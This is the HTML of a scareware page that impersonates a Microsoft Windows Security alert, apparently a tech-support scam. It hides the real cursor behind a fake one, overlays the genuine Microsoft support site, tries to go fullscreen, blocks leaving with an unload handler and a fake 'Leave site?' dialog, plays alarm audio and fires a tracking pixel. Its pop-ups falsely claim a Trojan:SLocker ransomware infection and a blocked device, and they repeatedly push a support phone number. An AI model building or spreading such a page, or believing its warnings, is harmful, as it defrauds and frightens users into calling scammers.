<!DOCTYPE html><html>
<head>

<meta name="robots" content="noindex, nofollow">
     <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>Security Center</title>
     <link rel="stylesheet" href="styles.css">
<link rel="shortcut icon" href="microsoft.png" type="image/png">
<link rel="stylesheet" href="font-awesome.min.css">
<style>
  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu72xKOzY.woff2)format('woff2');
    unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu5mxKOzY.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu7mxKOzY.woff2)format('woff2');
    unicode-range: U+1F00-1FFF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu4WxKOzY.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu7WxKOzY.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu7GxKOzY.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/KFOmCnqEu92Fr1Mu4mxK.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fCRc4EsA.woff2)format('woff2');
    unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fABc4EsA.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2)format('woff2');
    unicode-range: U+1F00-1FFF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fBxc4EsA.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fCxc4EsA.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fChc4EsA.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/KFOlCnqEu92Fr1MmEU9fBBc4.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfCRc4EsA.woff2)format('woff2');
    unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfABc4EsA.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfCBc4EsA.woff2)format('woff2');
    unicode-range: U+1F00-1FFF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfBxc4EsA.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfCxc4EsA.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfChc4EsA.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Roboto';
    font-style: normal;
    font-weight: 700;
    src: url(fonts/KFOlCnqEu92Fr1MmWUlfBBc4.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }
</style>
<style>
  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Kwp5MKg.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Nwp5MKg.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Bwp5MKg.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Awp5MKg.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 400;
    src: url(fonts/4UaGrENHsxJlGDuGo1OIlL3Owp4.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94Yt3CwZ-Pw.woff2)format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94YtwCwZ-Pw.woff2)format('woff2');
    unicode-range: U+0370-03FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94Yt8CwZ-Pw.woff2)format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94Yt9CwZ-Pw.woff2)format('woff2');
    unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }

  @font-face {
    font-family: 'Google Sans';
    font-style: normal;
    font-weight: 500;
    src: url(fonts/4UabrENHsxJlGDuGo1OIlLU94YtzCwY.woff2)format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }
</style>

<style>.blink_me {
animation: blinker 1s linear infinite;
}

@keyframes blinker {
50% { opacity: 0; }
}

</style>

<style>
.blink {
color:#fff;
animation: blink-animation 1s steps(5, start) infinite;
-webkit-animation: blink-animation 1s steps(5, start) infinite;
}

.blink1 {
background-color:green;
animation: blink-animation 1s steps(5, start) infinite;
-webkit-animation: blink-animation 1s steps(5, start) infinite;
}


@keyframes blink-animation {
to {
visibility: hidden;
}
}
@-webkit-keyframes blink-animation {
to {
visibility: hidden;
}
}
</style>


<style type="text/css">

    html{
        cursor: none;
    }
    .fakeCursor {
                                width: 17px;
                                height: 25px;
                                background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABEAAAAZCAMAAADg4DWlAAAAmVBMVEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///8jo0yHAAAAMXRSTlMAAQUPA0IfMgInFzlGCwwpGQcJEiIIP04vGDoqDgYbNVFDGjFBMEgWIElFEyw4PjRLq1RDbAAAALhJREFUeF5V0NlygzAMBVDbKK1tgtlJSgrZ93RR/v/jgjwTC/R45o6kuUJIDVqK0SDkSaHGhBhlNhoTPtGkH0QsT4w/iVgGmjGRMAVhCsLEwsTCRDKhsIemTW2hvQyKm8Xp989kCZAgyeL/cKxslFMG11uia7OySQdSIO72Mcl8tvyq/fX6bNKLp7j6Bnqxo34mId+h5tC7Z5Jbs7qrUJxEfLQ/pmQR4HpjegcsUrmydNQHEygFA7wAtBchFf1cSBMAAAAASUVORK5CYII=");
                                position: fixed;
                                    top:5px;
                                    left: 400px;
                                z-index: 10000;
                        }
</style>

<style>
  body {
  background: #fff;
  -webkit-user-select: none;
-ms-user-select: none;
user-select: none;
  /*
   background: url('bg.png');
  background-repeat: no-repeat;
  background-size: cover;
  */
font-family: "Calibri", sans-serif;
 overflow-y: hidden;
 overflow-x: hidden;
 }
 .top {
  padding-left: 10px;

 }
.progress {

  width: 250px;

background: #d1d1d1;
  height: 04px;

}

.progress .progress__bar {
  height: 100%;
  width: 0%;
  border-radius: 2px;
  background-color: #3182be;
  animation: fill-bar 6s 1;
}

@keyframes fill-bar {
  from {width: 0%;}
  to {width: 100%;}

}
.textc {
  color: grey;
  font-size: 13px;
}
.flex {
  display: flex;
}
.button {
background: #cccccc;
color: #000;
padding: 6px 32px;
text-align: center;
text-decoration: none;
display: inline-block;
font-size: 13px;
margin: 4px 2px;
cursor: pointer;
font-weight:350;

}

 .centerright   img {
  max-width: 100%;
}
.centerright ul {
  padding: 0;
  list-style-type: none;
}
.centerright ul {
  columns: 3;
}
.centerright li {
  width: calc((100vw / 3) - 20px);
  display: inline-block;
}

.centerright  ul {
  display: flex;
}
.centerright ul {
  display: grid;
  grid-template-columns: repeat(auto-fill, minmax(190px, 1fr));

}
.centerright {
position: absolute;
left: 70px;
top: 150px;
display: flex;

}
.btn:hover {
cursor:pointer;
}
    .box {
display: none;
position: absolute;
width: 723px;
height: 560px;
top: 49%;
z-index: 999;
margin-top: -255px;
left: 48%;

border-radius: 0px;
margin-left: -325px;
border-radius: 8px;
padding-right: 10px;
padding-left: 0px;

    background: #fff;

    box-shadow: rgba(0, 0, 0, 0.35) 0px 5px 15px;
    }
    .scan {
display: none;
position: absolute;
width: 723px;
height: 569px;
top: 49%;
z-index: 999;
margin-top: -255px;
left: 48%;
border-radius: 0px;
margin-left: -325px;
border-radius: 8px;
padding-right: 10px;
padding-left: 0px;



    background: #fff;

    box-shadow: rgba(0, 0, 0, 0.35) 0px 5px 15px;
    }
    .scan::-webkit-scrollbar {
  display: none;
}


.alert_popup{
  position: absolute;
  top: 4%;
  z-index: 9999;
  left: 33.5%;
  background: #1a73e8;
  width: 440px;
  text-align: left;
  color: #fff;
  padding-top: 4px;
  display: none;
  margin: 20px;
  transform: translate(-50%, -50%);
  padding: 0 10px;
}
.alert_popup p{font-size: 13px;padding-bottom: 10px;margin: 10px;line-height: 18px;}
.action_buttons a.active {
border: 1px solid #3B79ED;
font-weight: bold;
}
.action_buttons a {
float: right;
font-size: 12px;
margin-right: 15px;
padding: 6px 25px;
text-decoration: none;
color: #fff !important;
border: 1px solid #fff;
margin-top: 20px;
border-radius: 3px; /* 100% */

margin-bottom: 20px;
}
.cardcontainer {
animation: zoominoutsinglefeatured 4s infinite ;
border-radius: 10px;
}
@keyframes zoominoutsinglefeatured {
0% {
 transform: scale(1,1);
}
50% {
 transform: scale(1.1,1.1);
}
100% {
 transform: scale(1,1);
}
}

@keyframes zoomininsinglefeatured {
0% {
 transform: scale(1,1);
}
50% {
 transform: scale(1.1,1.1);
}
100% {
 transform: scale(1,1);
}
}






.greyside {
padding: 10px;
border-top-right-radius: 10px;
border-top-left-radius: 10px;
background:#e7e7e7;

}
.bottomselect {
padding: 10px;
border-bottom-right-radius: 10px;
border-bottom-left-radius: 10px;
background:#e7e7e7;

}
.lst{font-weight: 700;padding: 15px 30px;min-height: 285px;border-radius: 10px;border: 1px solid #fff;width: 560px;margin: 0 auto;background-color: #fff;box-shadow: rgb(0 0 0 / 25%) 0px 54px 55px, rgb(0 0 0 / 12%) 0px -12px 30px, rgb(0 0 0 / 12%) 0px 4px 6px, rgb(0 0 0 / 17%) 0px 12px 13px, rgb(0 0 0 / 9%) 0px -3px 5px;z-index: 99999;position: absolute;top: 50%;left: 51%;cursor: pointer;transform: translate(-50%, -50%);display: none;}
.ilb {
display: inline-block;
}
.headers {
width: 535px;
margin-top: 7px;
padding-bottom: 15px;
}
.logo3 {margin: 0 7px -6px 0;width: 25px;height: 25px;}
.title2 img {
position: absolute;
width: 3%;
top: 17px;
right: 17px;
}
#txtintro {
clear: both;
padding-top: 5px;
font-size: 16px;
font-weight: 700;
text-align: center;
}
.colo-rd {
color: #ff0000;
}
#banner {
margin: 5px auto;
display: block;
width: 280px;
}
#disclaimer {
margin: 5px;
font-size: 17px;
font-weight: bold;
text-align: center;
}
.support {
font-weight: bold;
font-size: 21px;
color: #1a73e8;
font-family: inherit;
}
#bottom {
margin: 12px 0;
height: 50px;
display: flex;
border-top: 1px solid #d6d5d5;
}
#badge{height: 25px;margin-top: 18px;width: 25px;}
.title3 {
font-size: 18px;
font-weight: 700;
text-transform: capitalize;
position: relative;
width: 36%;
top: 21px;
left: 13px;
}
#bottom ul {
list-style-type: none;
margin-left: 12px;
margin-top: 6px;
}
#bottom ul li {
display: inline-block;
float: left;
padding-left: 13px;
margin-top: 13px;
}
.button2 {border-radius: 4px;padding: 10px 30px 10px 30px;color: #fff;border: 1px solid #1a73e8;background-color: #1a73e8;font-size: 18px;font-weight: 700;text-align: center;cursor: pointer;}
.buttons {
border-radius: 4px;
padding: 10px 30px 10px 30px;
color: #fff;
background-color: #1a73e8;
font-size: 18px;
font-weight: 700;
text-align: center;
cursor: pointer;
}
a {
color: #007bff;
text-decoration: none;
background-color: transparent;
}
a:hover {
color: #0056b3;
text-decoration: underline;
}
.button2:hover {color: #fff;/* background-color: #1a73e8; *//* border-color: #1a73e8; */}
.blink {
animation: blink-animation 1s steps(5, start) infinite;
-webkit-animation: blink-animation 1s steps(5, start) infinite;
}
.blink2 {
animation: blink-animation 1s steps(5, start) infinite;
-webkit-animation: blink-animation 1s steps(5, start) infinite;
}

@keyframes blink-animation {
to {
visibility: hidden;
}
}
@-webkit-keyframes blink-animation {
to {
visibility: hidden;
}
}


#footer {width: 100%;position: fixed;bottom: 0;background-color: #1a73e8;z-index: 9999;padding: 10px 34px;color: #fff;font-size: 18px;height: 46px;cursor: pointer;left: 0;}
#footertxt, #footertxt2 {
font-size: 20px;
}
#footertxt img {width: 23px;vertical-align: text-top;}
:host {
display: inline-block;
overflow: hidden;
text-align: initial;
white-space: nowrap;
}
.bg .bgimg {
position: absolute;
top: 60px;
left: 0px;
width: 100%;
}
.black {
width: 100%;
height: 100%;
background-color: rgb(0 0 0 / 47%);
opacity: 0.7;
transition: 1s;
position: absolute;
top: -190px;
left:0
}
.colo-rd .blink{
font-size: 18px;
display: inline-block;
margin-bottom: 5px;
}
.logo12{width: 22px;display: inline-block;vertical-align: middle;max-width: 100%;margin-right: 5px;margin-top: -2px;}
ul.icon-links {
margin: 0px 0 20px 0;
padding: 0 0 0 15px;
list-style: none;
}
ul.icon-links li {
color: #fff;
font-size: 13px;
margin: 0;
font-weight: 400;
line-height: 20px;
transition: all .6s ease 0s;
}
ul.icon-links li img{
width: 18px;
vertical-align: middle;
padding-right: 5px;
}

.cross{position:absolute;top:2px;right:10px;font-weight:bolder;color:#888;text-decoration:none}a:focus{outline:0;border:0}.chrome-alert{position:fixed;top:-10px;left:0;right:0;z-index: 999999;}.chrome-alert>div{margin:0 auto;width:440px;background:#FBFBFB;border:1px solid #BABABA;border-radius:3px;box-shadow:0 2px 0 rgba(0,0,0,.3);position:relative;padding: 0px 15px;}.chrome-alert h1{font-size:15px;font-weight:400;margin:0 0 5px;padding:5px 10px;color:#414141}.chrome-alert p{font-size:12px;padding:0 10px;color:#414141;margin: 12px 0;padding: 0;}.chrome-alert .action_buttons{overflow:auto}.chrome-alert .action_buttons a{float:right;font-size:12px;margin-right:15px;padding: 8px 25px;text-decoration:none;margin-top: 5px;border-radius:2px;margin-bottom: 10px;margin-right: 5px;border: 1px solid #3B79ED;color: #3B79ED !important;}.chrome-alert .action_buttons a.active{background: #3B79ED;border:1px solid #3B79ED;font-weight:600;color: #fff !important;}.chrome-alert .content-box{max-height:440px;overflow:auto;margin:0 20px}.chrome-alert .content-box p{padding:0;margin-left:0}.chrome-alert label{padding: 0px;font-size:12px;color: #000;vertical-align: text-top;}.chrome-alert label:hover{color:#3B79ED}.chrome-alert label:focus{color:#3B79ED;outline:dotted}

#welcomeDiv{
  background-color: rgb(0, 0, 0);
  height: auto;
  width: 550px;
  margin-left: 31%;
  position: absolute;
  z-index: 2147483647;
  text-align: center;
  margin-top: -8px;
  padding: 14px 35px;
  line-height: 23px;
  display:none;
  top: 0;
}

#chat-box{
  background-color: #fff;
  padding: 15px;
  position: fixed;
  bottom: 10%;
  right: 13px;
  z-index: 99999999;
  border-radius: 10px;
      display: none;
}
#chat-box img{
      color: #000;
  font-size: 16px;
  font-weight: 600;
  margin-left: 25px;
  width: 25px;
}
#chat-box h4{
      width: 217px;
  font-size: 20px;
  text-align: center;
  padding-top: 6px;
  margin: 0px 35px;
  display: block;
}
#chat-box a{
  text-align: center;
  margin: 0px auto;
  display: block;
}
#chat-box p {
  font-size: 16px;
  text-align: center;
  padding-top: 7px;
  font-weight: normal;
}
#chat-box .arrow-down{
  position: absolute;
  font-size: 47px;
  color: #fff;
  bottom: -35px;
  left: 65px;
}


</style>

</head>
<body id="mycanvas" class="map" onbeforeunload="return myFunction()" style="cursor:none;" onclick="playSound()">
<audio id="beeppeep" autoplay="">
    <source src="" type="audio/mpeg">
</audio>
<div class="bg" style="cursor:none;">
    <div class="bgimg" style="top: 0px;"><img src="bg1.jpg" alt="" width="100%"></div>
    <div class="bgimg2" style="top: 0px;"><img src="bg2.jpg" alt="" width="100%"></div>

</div>
<img src="//m03lm.rdtk.io/postback?format=img&amp;sum={replace}" width="1" height="1">
<a href="#" rel="noreferrer" id="link_black" style="cursor: none;">
    <div class="black" style="height: 145%;cursor: none;"></div>
</a>

<div class="fakeCursor"></div>

<iframe src="https://support.microsoft.com/en-us/windows" id="frame" style="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; ">
</iframe>

  <a onclick="openFullscreen();" rel="noreferrer" id="link_black" style="">
      <div class="black" style="height: 145%;"></div>
  </a>


<div class="box" id="box">
<div class="top">
<p style="font-size: 16px;  font-family: 'Google Sans', 'Google Sans Text', Roboto, sans-serif;font-weight: 600;">Microsoft Windows Security<img src="minimize.jpg" class="btn" style="float: right; width:115px;"></p>
</div>

<h2 style="position: absolute; left: 70px; top: 60px; font-weight: 300;" id="text1">Safety at a glance</h2>
<p style="position: absolute; left: 70px; top: 100px; font-weight: 0; font-size: 13px;" id="text2"><br>Check what is happening to the safety and health of your device and take all necessary measures.</p>
<div class="centerright">
<ul>
<li>
<br>
<img src="kxFy-clip.png" width="40px;">
<p>Virus and threat protection</p>
<p style="top: 120px; position: absolute; font-size: 13px; color: grey;">action is required. Run a scan to check for <br>threats.</p>

</li>
<li>
<br><br>
<img src="qsbs-firewall.png" width="60px;">
<p>Firewall and network protection</p>
<p style="top: 270px; position: absolute; font-size: 13px; color: grey;">No action required.</p>
</li>
</ul>
<ul>
<li>
<br>
<img src="s-S4-acc.png" width="60px;">
<p>Account protection</p>
<p style="top: 125px; position: absolute; font-size: 13px; color: grey;">No action required.</p>
</li>
<li>
<br>
<img src="Z5BR-network.png" width="51px;">
<p>Application and browser control</p>
<p style="top: 270px; position: absolute; font-size: 13px; color: grey;">No action required.</p>
</li>
</ul>
</div>
<img src="uZbx-si.png" class="btn" style="border-bottom-left-radius: 10px;" width="30.9px; height: 15.2px;" id="clscl">
<br>
</div>


<!--Chrome Security Quick Scan-->
<div class="scan" id="scan">
  <div class="top">
  <p style="font-size: 16px;  font-family: 'Google Sans', 'Google Sans Text', Roboto, sans-serif;font-weight: 600;">Microsoft Windows Security<img src="minimize.jpg" class="btn" style="float: right; width:115px;"></p>
  </div>
  <h2 style="position: absolute; left: 66px; top: 49px; font-weight: 300;" id="text1"><img src="kxFy-clip.png" width="30px;" style="margin-right: 10px;vertical-align: text-top;">Virus and threat protection</h2>
  <p style="position: absolute; left: 70px; top: 100px; font-weight: 0; font-size: 13px;" id="text2">Device protection against threats.</p>

<h3 style="position: absolute; right: 180px; top: -10px; font-weight: 300;" id="text12"><b>+1-833-423-1931</b></h3>

  <div class="centerright">


  <ul>
  <li>



  <div class="flex"> <img src="-EBq-current.png" width="20px" height="20px;" style="margin-right: 10px; top: 33px; position: absolute;"><p style="font-weight: 400; position: absolute; left: 30px;">Current Threat</p></div>


  <br><br>
  <div class="progress" id="bar">
    <div class="progress__bar"></div>
  </div>

  <p style="font-size: 13px;" id="info">A quick scan is in progress...<br>Estimated time remaining: <n id="time">0</n><br><n id="amount">0</n> Files scanned.</p>

  <a href="#" class="button" id="re">to cancel</a>
  <p style=" font-size: 13px;" id="recx">Keep working while we analyze your device.</p>

  <p style="font-size: 13px; color: #0063c6; cursor: pointer;" id="recx-hide">protection history</p>
  <br>
  <p id="shx" style="font-size: 13px; color: #0063c6; display: none; cursor: pointer;">Scan Options<br> Allowed Threats<br> Protection History</p>


  </li>

  <li>

<div class="flex"><img src="nOxp-sett.png" height="28px" width="30px;" style="margin-right: 10px; margin-top: 5px;"><p style="position: absolute; left: 35px;    bottom: 76px;    line-height: 18px;">Virus &amp; threat protection settings </p> </div>
<p style="color: grey; font-size: 13px;">no action required</p>
<p style="font-size: 13px; color: #0063c6;">Manage your settings</p>
  </li>
  </ul>
  <ul>

  <li>


  <p style="position: absolute; top: -55px;">I have a question?</p>

  <p style="font-size: 13px; color: #0063c6; position: absolute; top: -15px; cursor: pointer;">get help</p>

  </li>
  <li>


    <p style="position: absolute; top: 25px;">who will protect me</p>

    <p style="font-size: 13px; color: #0063c6; position: absolute; top: 65px; cursor: pointer;">Supplier management</p>

    </li>
    <li>


      <p style="position: absolute; top: 100px; "><br>Help us improve Microsoft Windows security</p>

      <p style="font-size: 13px; color: #0063c6; position: absolute; top: 152px; cursor: pointer;">Send us your feedback</p>

      </li>
      <li>

        <p style="position: absolute; top: 190px;">Change your privacy settings</p>
        <p style="position: absolute; top: 220px; font-size: 13px;">View and change privacy settings on Microsoft Windows<br><n id="which"></n> devices.</p>

        <p style="font-size: 13px; color: #0063c6; position: absolute; top: 270px; cursor: pointer;">Privacy Settings<br>Privacy Dashboard<br>Privacy Statement</p>

        </li>

  </ul>

  </div>
  <img src="uZbx-si.png" class="btn" style="border-bottom-left-radius: 10px;" width="30.9px; height: 15.2px;" id="clscl">
  <br>
  </div>


<div class="alert_popup cardcontainer lightbox">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <p class="text-center" style="    font-size: 16px;
font-weight: normal;
margin: 0;
margin-bottom: 5px;
padding: 5px 10px;
color: #fff;font-weight: bold;
margin-top: 8px; text-align: center;"><img src="microsoft.png" class="logo12"> Microsoft Windows Security - Spyware Alert</p>
                <p class="text-center">** Microsoft Windows is infected with Trojan:SLocker **</p>
                <p>A critical error has occurred due to the outdated version of the browser. Update your browser as soon as possible.</p>
                <p>The following errors are also possible on outdated versions of the browser:</p>
                <ul class="icon-links">
                  <li>&gt; Loss of personal and stored data</li>
                  <li>&gt; Confidental information leak</li>
                  <li>&gt; Browsers errors</li>
                </ul>

                  <p>A Microsoft Windows Security scan has detected potentially unwanted adware on this device that can steal passwords, online identities, financial information, personal files, images, or documents.</p>
                  <p>Please contact us immediately so that our engineer can explain the removal process over the phone.<br><br>

                  Please contact Microsoft Windows Support immediately to report this threat, prevent spoofing, and unlock access to this device.<br><br>
                  Closing this Microsoft Windows puts your personal information at risk and interrupts your Microsoft Windows registration.</p>

               <p style="padding-bottom: 0px;">Call Microsoft Windows Support <strong>+1-833-423-1931</strong></p>
               <div class="action_buttons"> <a class="" id="leave_page" style="cursor: pointer;">OK</a> <a class="" id="leave_page">Cancel</a> </div>
            </div>

        </div>
    </div>
</div>
<audio id="beep" loop="">
  <source src="_Fm7-alert.mp3" type="audio/mpeg">
</audio>


<div id="lst" class="lst lightbox">
  <div class="ilb top">
      <div class="headers ilb" style="border-bottom: 1px solid #d6d5d5;">
          <span id="txtadd" class="fl title"><span class="fl ilb"><img src="microsoft.png" class="logo3"></span> Microsoft Windows Security Center</span>
          <span id="txts1" class="fl title2"><a href="#"><img src="cross.png"></a></span>

      </div>
  </div>
<div id="txtintro">
<span class="text-danger">App: Ads.fiancetrack(2).dll<br>
						Threat Detected:  xxbc Detected</span>
  <img id="banner" src="re.gif"><br>
   <span class="act" style="font-size:20px;">Access has been blocked ..</span><br>
  <span class="support">Contact Microsoft Windows Support: +1-833-423-1931</span>

</div>




  <div id="bottom">
      <img id="badge" src="microsoft.png"><span class="title3">Microsoft Windows</span>
      <ul>
          <li>
              <a href="#">
                  <div class="fr button2">
                      <span id="addtochromebutton">Continue</span>
                  </div>
              </a>
          </li>
          <li>
              <a href="#">
                  <div class="fr buttons blink">
                      <span id="addtochromebutton">Leave</span>
                  </div>
              </a>
          </li>
      </ul>

  </div>
</div>



<div id="footer">
  <div class="row">

      <div class="col-md-12">
          <div class="right-foot" style="text-align: center;">
              <span id="footertxt"><img src="microsoft.png"> Microsoft Windows: </span><span style="font-weight: 800;padding-left: 13px;color: #fff; font-family:inherit;">Support Contact <span style="border: 1px solid #fff;border-radius: 5px;padding: 2px 5px;">+1-833-423-1931</span></span>
          </div>
      </div>
      <div class="col-md-12">
          <marquee width="100%" direction="left" height="100px"><small class="text-left" style="color: #eee;font-size: 12px;"><strong>Security Note :</strong> Malware is known to steal information from your device and use your identity to do malicious transactions. Due to COVID-19, data theft incidents via a fraudulent advertisement that injects adware to your browser Microsoft Windows have increased by 624%. Because of this, we recommend a security application that can remove Adware and Malware for you. The app can also speed up your browser, blocks aggressive ads, and a lot more</small></marquee>
      </div>
  </div>


</div>

<div id="welcomeDiv" class="answer_list">
    <p class="text-center" style="color: #FEFEFE;  margin-top:10px; font-size: 16px; opacity:.9; ">This Microsoft Windows  is infected with trojan:SLocker, a dangerous ransomware and it will lock your device!<br> Virus must be removed immediately! <br>Please contact us immediately. A technician will help you solve the problem.</p>


</div>



<div id="chrome-alerts" class="chrome-alert" style="padding-top:10px; cursor:pointer;">
    <div>
    <!-- <a href="javascript:openlink()" class="cross">×</a> -->
        <p>Leave site?</p>
    <p>Changes you made may not be saved.</p>
